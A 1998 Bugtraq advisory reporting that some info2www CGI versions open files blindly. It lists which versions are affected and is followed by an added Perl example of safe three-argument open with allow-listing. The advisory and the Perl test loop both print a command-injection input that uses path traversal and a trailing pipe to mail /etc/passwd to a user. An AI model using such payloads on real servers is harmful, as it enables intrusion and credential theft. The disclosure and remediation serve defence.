Bugtraq: Vulnerabilities in some versions of info2www CGI

From: Niall Smart <njs3_at_DOC.IC.AC.UK>
Date: Tue, 3 Mar 1998 11:26:49 +0000

Hi,

Some versions of the info2www CGI blindly open files:

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
$
You have new mail.
$

Trying to track down which versions of info2www have this bug and which
don't has been difficult; there are lots of variants out there, some
of which aren't vulnerable. Instead of trying to make a list of versions
which are vulnerable, I'll just say that:

 - if it has no version number, it's probably vulnerable
 - the uuencoded version at CPAN is corrupt, and the one
   which the README file tells you to get is vulnerable
 - version 1.1 is vulnerable
 - version 1.2.x seems ok (but I'm no Perl expert)

Apparently info2www is based on info2html and infogate, so these may
have problems too.

Niall
Received on Mar 03 1998
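
The following is an added example for anyone auditing a local copy of the script; it is not part of the original post and not code from info2www. It assumes the "blind open" is Perl's two-argument open() applied to the requested file name, and the names $INFO_DIR and open_info_file are hypothetical.

```perl
#!/usr/bin/perl
# Added illustration; not info2www code. $INFO_DIR and open_info_file
# are hypothetical names.
use strict;
use warnings;
use File::Spec;
use Cwd qw(realpath);

my $INFO_DIR = '/usr/share/info';   # assumed location of the info files

# Unsafe pattern (assumed root cause): with two-argument open the *data*
# selects the mode, so a name ending in "|" is run as a command:
#     open(FH, $file);
sub open_info_file {
    my ($name) = @_;

    # Allow-list: a bare file name, no path separators, spaces or
    # shell metacharacters. The capture also untaints under -T.
    return unless defined $name
        && $name =~ /\A([A-Za-z0-9][A-Za-z0-9._+-]*)\z/;
    my $clean = $1;

    # Resolve symlinks and confirm the result is still inside $INFO_DIR.
    my $base = realpath($INFO_DIR) or return;
    my $path = realpath(File::Spec->catfile($base, $clean)) or return;
    return unless index($path, "$base/") == 0 && -f $path;

    # Three-argument open: the mode is fixed to "<", so the name is never
    # interpreted as a pipe or a redirection.
    open(my $fh, '<', $path) or return;
    return $fh;
}

# Constructed inputs: a plain file name, and one shaped like the request
# shown in the post.
for my $req ('dir', '../../../../bin/mail jami </etc/passwd|') {
    my $fh = open_info_file($req);
    printf "%-45s %s\n", "'$req'", $fh ? 'opened read-only' : 'rejected';
    close $fh if $fh;
}
```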
